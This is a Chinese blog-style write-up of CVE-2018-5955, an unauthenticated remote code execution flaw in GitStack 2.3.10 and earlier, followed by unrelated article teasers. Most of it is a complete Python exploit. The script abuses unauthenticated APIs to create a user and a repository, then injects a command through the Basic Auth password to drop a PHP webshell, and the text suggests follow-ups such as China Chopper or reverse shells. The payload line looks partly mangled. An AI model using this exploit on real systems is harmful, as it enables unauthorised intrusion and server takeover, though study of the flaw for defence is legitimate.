热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

GitStack系统RCE漏洞学习

漏洞简介漏洞简情+漏洞程序GitStack+影响版本先利用未授权的api创建用户,然后利用未授权的api创建项目,然后把用户加入项目中。我们来看EXP的代码部分:然后访问index

漏洞简介

漏洞简情


  • 漏洞程序 GitStack
  • 影响版本 <=2.3.10
  • 漏洞类型 RCE
  • 漏洞评价 高危
  • 漏洞编号 CVE-2018-5955

漏洞程序介绍


GitStack是一款基于Python(Django框架)和PHP的win平台下的git可视化平台。它存在很多问题,下面简单介绍一下所有的背景安全问题。这些背景安全问题将导致RCE漏洞的利用。

背景安全问题

默认弱口令admin/admin,以及口令提示


技术分享图片

 debug模式开启,泄露敏感信息


https://a.b.c.d/rest/settings/general/admin/
可以获取足够的有效信息
技术分享图片

API未授权访问


举例如下:
技术分享图片
技术分享图片
技术分享图片

RCE漏洞利用思路以及EXP


先利用未授权的api创建用户,然后利用未授权的api创建项目,然后把用户加入项目中。
我们来看EXP的代码部分:

def __userCheck(self):
        ‘‘‘用户检查‘‘‘
        url = ‘%s/rest/user/‘%self.target
        try:
            usersJson = requests.get(url, verify=False).json()
        except Exception, reason:
            print ‘[-] 连接GitStackAPI失败‘
            exit(0)
        try:
            usersJson.remove(‘admin‘)
            usersJson.remove(‘eyeryone‘)
        except Exception, reason:
            pass
        if len(usersJson) > 0 and ‘pentest‘ in usersJson:
            self.user = ‘pentest‘
            print ‘[+] 发现可用账户:‘,self.user
        else:
            try:
                respOnse= requests.post(url, data={‘username‘:‘pentest‘, ‘password‘:‘pentest‘}, verify=False)
            except Exception, reason:
                print ‘[-] 创建用户失败‘
                exit(0)
            if ‘User created‘ not in response.text:
                print ‘[-] 创建用户失败‘
                exit(0)
            else:
                print ‘[+] 创建用户成功‘
                self.user = ‘pentest‘

    def __repositoryCheck(self):
        ‘‘‘项目检查‘‘‘
        url = ‘%s/rest/repository/‘%self.target
        try:
            repositoryJson = requests.get(url, verify=False).json()
        except Exception, reason:
            print ‘[-] 连接GitStackAPI失败‘
            exit(0)
        if repositoryJson:
            repository = repositoryJson[0][‘name‘]
            print ‘[+] 发现可用项目:‘,repository
            self.repository = repository
        else:
            try:
                respOnse= requests.post(url, COOKIEs={‘csrftoken‘:‘pentest‘}, data={‘name‘:‘pentestgit‘, ‘csrfmiddlewaretoken‘:‘pentest‘})
            except Exception, reason:
                print ‘[-] 创建项目失败‘
                exit(0)
            if ‘successfully create repository‘ not in response.text:
                print ‘[-] 创建项目失败‘
                exit(0)
            else:
                print ‘[+] 创建项目成功‘
                self.repository = ‘pentestgit‘

    def __permissionCheck(self):
        ‘‘‘权限检查‘‘‘
        url = url = ‘%s/rest/repository/%s‘%(self.target,self.repository)
        try:
            respOnse= requests.get(url, verify=False)
        except Exception, reason:
            print ‘[-] 权限检查失败‘
            exit(0)
        users = response.json()[‘user_write_list‘]
        flag = False
        if len(users) > 0:
            if self.user in [x[‘username‘] for x in users]:
                print ‘[+] 权限检查成功‘
                flag = True
        if not flag:
            url = ‘%s/rest/repository/%s/user/%s/‘%(self.target, self.repository, self.user)
            try:
                respOnse= requests.post(url, verify=False)
            except Exception, reason:
                print ‘[-] 加载权限失败‘
                exit(0)
            try:
                respOnse= requests.get(url, verify=False)
            except Exception, reason:
                print ‘[-] 验证权限失败‘
                exit(0)
            if ‘true‘ in response.text:
                print ‘[+] 权限加载成功‘
            else:
                print ‘[-] 权限验证失败‘
                exit(0)

然后访问index.php,在访问index.php的时候访问该项目的时候回对用户名密码进行验证,这个地方使用的HttpBasicAuth进行验证,在password字段存在RCE漏洞,可有在这个地方构造Payload利用执行,然后就可以写入一句话,菜刀连接也好,反弹shell也好,创建用户名密码远程登录也好,都可以操作了。

def __attack(self):
        ‘‘‘攻击尝试‘‘‘
        url = ‘%s/web/index.php?p=%s.git&a=summary‘%(self.target, self.repository)
        try:
            respOnse= requests.get(url, auth=HTTPBasicAuth(self.user, self.payload), verify=False)
        except Exception, reason:
            print ‘[-] 攻击失败‘
            exit(0)
        url = ‘%s/web/gitstack.php‘%self.target
        try:
            respOnse= requests.get(url, verify=False)
        except Exception, reason:
            print ‘[-] 验证攻击失败‘
            exit(0)
        if response.status_code == 200:
            print ‘[+] 攻击成功‘
        else:
            print ‘[-] 尝试访问无效,攻击失败‘
            exit(0)

完整代码如下:


#!/usr/bin/env python
# -*- coding:utf-8 -*-

‘‘‘
CVE-2018-5955 GitStack<= 2.3.10 远程命令执行漏洞 EXP 改进版
借鉴POC作者:CaijiOrz(GitHub账号)
作者:b0b@c
使用:仅限于学习、交流、公司内部使用
‘‘‘

import requests
from optparse import OptionParser
from requests.auth import HTTPBasicAuth

class Exploitor(object):
    ‘‘‘Rce漏洞利用器‘‘‘
    def __init__(self, target, abusepath=‘c:\\GitStack\\gitphp‘, payload=None):
        ‘‘‘Rce漏洞利用器创建‘‘‘
        self.target = target
        self.abusepath = abusepath
        if payload == None:
            self.payload = "p && echo ^ > %s\\gitstack.php"%self.abusepath
        else:
            self.payload = "p && echo ^ > %s\\gitstack.php"%(self.payload, self.abusepath)

    def __userCheck(self):
        ‘‘‘用户检查‘‘‘
        url = ‘%s/rest/user/‘%self.target
        try:
            usersJson = requests.get(url, verify=False).json()
        except Exception, reason:
            print ‘[-] 连接GitStackAPI失败‘
            exit(0)
        try:
            usersJson.remove(‘admin‘)
            usersJson.remove(‘eyeryone‘)
        except Exception, reason:
            pass
        if len(usersJson) > 0 and ‘pentest‘ in usersJson:
            self.user = ‘pentest‘
            print ‘[+] 发现可用账户:‘,self.user
        else:
            try:
                respOnse= requests.post(url, data={‘username‘:‘pentest‘, ‘password‘:‘pentest‘}, verify=False)
            except Exception, reason:
                print ‘[-] 创建用户失败‘
                exit(0)
            if ‘User created‘ not in response.text:
                print ‘[-] 创建用户失败‘
                exit(0)
            else:
                print ‘[+] 创建用户成功‘
                self.user = ‘pentest‘

    def __repositoryCheck(self):
        ‘‘‘项目检查‘‘‘
        url = ‘%s/rest/repository/‘%self.target
        try:
            repositoryJson = requests.get(url, verify=False).json()
        except Exception, reason:
            print ‘[-] 连接GitStackAPI失败‘
            exit(0)
        if repositoryJson:
            repository = repositoryJson[0][‘name‘]
            print ‘[+] 发现可用项目:‘,repository
            self.repository = repository
        else:
            try:
                respOnse= requests.post(url, COOKIEs={‘csrftoken‘:‘pentest‘}, data={‘name‘:‘pentestgit‘, ‘csrfmiddlewaretoken‘:‘pentest‘})
            except Exception, reason:
                print ‘[-] 创建项目失败‘
                exit(0)
            if ‘successfully create repository‘ not in response.text:
                print ‘[-] 创建项目失败‘
                exit(0)
            else:
                print ‘[+] 创建项目成功‘
                self.repository = ‘pentestgit‘

    def __permissionCheck(self):
        ‘‘‘权限检查‘‘‘
        url = url = ‘%s/rest/repository/%s‘%(self.target,self.repository)
        try:
            respOnse= requests.get(url, verify=False)
        except Exception, reason:
            print ‘[-] 权限检查失败‘
            exit(0)
        users = response.json()[‘user_write_list‘]
        flag = False
        if len(users) > 0:
            if self.user in [x[‘username‘] for x in users]:
                print ‘[+] 权限检查成功‘
                flag = True
        if not flag:
            url = ‘%s/rest/repository/%s/user/%s/‘%(self.target, self.repository, self.user)
            try:
                respOnse= requests.post(url, verify=False)
            except Exception, reason:
                print ‘[-] 加载权限失败‘
                exit(0)
            try:
                respOnse= requests.get(url, verify=False)
            except Exception, reason:
                print ‘[-] 验证权限失败‘
                exit(0)
            if ‘true‘ in response.text:
                print ‘[+] 权限加载成功‘
            else:
                print ‘[-] 权限验证失败‘
                exit(0)

    def __attack(self):
        ‘‘‘攻击尝试‘‘‘
        url = ‘%s/web/index.php?p=%s.git&a=summary‘%(self.target, self.repository)
        try:
            respOnse= requests.get(url, auth=HTTPBasicAuth(self.user, self.payload), verify=False)
        except Exception, reason:
            print ‘[-] 攻击失败‘
            exit(0)
        url = ‘%s/web/gitstack.php‘%self.target
        try:
            respOnse= requests.get(url, verify=False)
        except Exception, reason:
            print ‘[-] 验证攻击失败‘
            exit(0)
        if response.status_code == 200:
            print ‘[+] 攻击成功‘
        else:
            print ‘[-] 尝试访问无效,攻击失败‘
            exit(0)

    def attack(self):
        ‘‘‘攻击过程‘‘‘
        self.__userCheck()
        self.__repositoryCheck()
        self.__permissionCheck()
        self.__attack()


if __name__ == ‘__main__‘:
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="Set Target")
    parser.add_option("-p", "--payload", dest="payload", help="Set Payload")
    parser.add_option("-f", "--filepath", dest="filepath", help="Set FilePath")
    (options, args) = parser.parse_args()
    if options.target in [None,‘‘]:
        print ‘[-] 请输入目标URL‘
        exit(0)
    else:
        if options.payload == None and options.filepath  == None:
            attacker = Exploitor(options.target)
        elif options.payload != None and options.filepath == None:
            attacker = Exploitor(options.target, payload=options.payload)
        elif options.payload == None and options.filepath != None:
            attacker = Exploitor(options.target, abusepath=options.filepath)
        elif options.payload != None and options.filepath != None:
            attacker = Exploitor(options.target, abusepath=options.filepath, payload=options.payload)
        attacker.attack()

鸣谢

参考项目 https://github.com/CaijiOrz/exploits/blob/master/GitStack_2.3.10_Unauthenticated_RCE.py
参考博客 https://xz.aliyun.com/t/2235

GitStack系统RCE漏洞学习


推荐阅读
  • 本文介绍了lua语言中闭包的特性及其在模式匹配、日期处理、编译和模块化等方面的应用。lua中的闭包是严格遵循词法定界的第一类值,函数可以作为变量自由传递,也可以作为参数传递给其他函数。这些特性使得lua语言具有极大的灵活性,为程序开发带来了便利。 ... [详细]
  • HDU 2372 El Dorado(DP)的最长上升子序列长度求解方法
    本文介绍了解决HDU 2372 El Dorado问题的一种动态规划方法,通过循环k的方式求解最长上升子序列的长度。具体实现过程包括初始化dp数组、读取数列、计算最长上升子序列长度等步骤。 ... [详细]
  • 本文介绍了C#中数据集DataSet对象的使用及相关方法详解,包括DataSet对象的概述、与数据关系对象的互联、Rows集合和Columns集合的组成,以及DataSet对象常用的方法之一——Merge方法的使用。通过本文的阅读,读者可以了解到DataSet对象在C#中的重要性和使用方法。 ... [详细]
  • 本文介绍了OC学习笔记中的@property和@synthesize,包括属性的定义和合成的使用方法。通过示例代码详细讲解了@property和@synthesize的作用和用法。 ... [详细]
  • 本文介绍了在SpringBoot中集成thymeleaf前端模版的配置步骤,包括在application.properties配置文件中添加thymeleaf的配置信息,引入thymeleaf的jar包,以及创建PageController并添加index方法。 ... [详细]
  • 知识图谱——机器大脑中的知识库
    本文介绍了知识图谱在机器大脑中的应用,以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例,说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案,如搜索关键词"Marie Curie",会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革,不仅美国的微软必应,中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]
  • 本文详细介绍了Linux中进程控制块PCBtask_struct结构体的结构和作用,包括进程状态、进程号、待处理信号、进程地址空间、调度标志、锁深度、基本时间片、调度策略以及内存管理信息等方面的内容。阅读本文可以更加深入地了解Linux进程管理的原理和机制。 ... [详细]
  • 后台获取视图对应的字符串
    1.帮助类后台获取视图对应的字符串publicclassViewHelper{将View输出为字符串(注:不会执行对应的ac ... [详细]
  • 《数据结构》学习笔记3——串匹配算法性能评估
    本文主要讨论串匹配算法的性能评估,包括模式匹配、字符种类数量、算法复杂度等内容。通过借助C++中的头文件和库,可以实现对串的匹配操作。其中蛮力算法的复杂度为O(m*n),通过随机取出长度为m的子串作为模式P,在文本T中进行匹配,统计平均复杂度。对于成功和失败的匹配分别进行测试,分析其平均复杂度。详情请参考相关学习资源。 ... [详细]
  • Java验证码——kaptcha的使用配置及样式
    本文介绍了如何使用kaptcha库来实现Java验证码的配置和样式设置,包括pom.xml的依赖配置和web.xml中servlet的配置。 ... [详细]
  • 高质量SQL书写的30条建议
    本文提供了30条关于优化SQL的建议,包括避免使用select *,使用具体字段,以及使用limit 1等。这些建议是基于实际开发经验总结出来的,旨在帮助读者优化SQL查询。 ... [详细]
  • CentOS 7部署KVM虚拟化环境之一架构介绍
    本文介绍了CentOS 7部署KVM虚拟化环境的架构,详细解释了虚拟化技术的概念和原理,包括全虚拟化和半虚拟化。同时介绍了虚拟机的概念和虚拟化软件的作用。 ... [详细]
  • 在project.properties添加#Projecttarget.targetandroid-19android.library.reference.1..Sliding ... [详细]
  • 猜字母游戏
    猜字母游戏猜字母游戏——设计数据结构猜字母游戏——设计程序结构猜字母游戏——实现字母生成方法猜字母游戏——实现字母检测方法猜字母游戏——实现主方法1猜字母游戏——设计数据结构1.1 ... [详细]
  • 本文介绍了一种解析GRE报文长度的方法,通过分析GRE报文头中的标志位来计算报文长度。具体实现步骤包括获取GRE报文头指针、提取标志位、计算报文长度等。该方法可以帮助用户准确地获取GRE报文的长度信息。 ... [详细]
author-avatar
丶希_
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有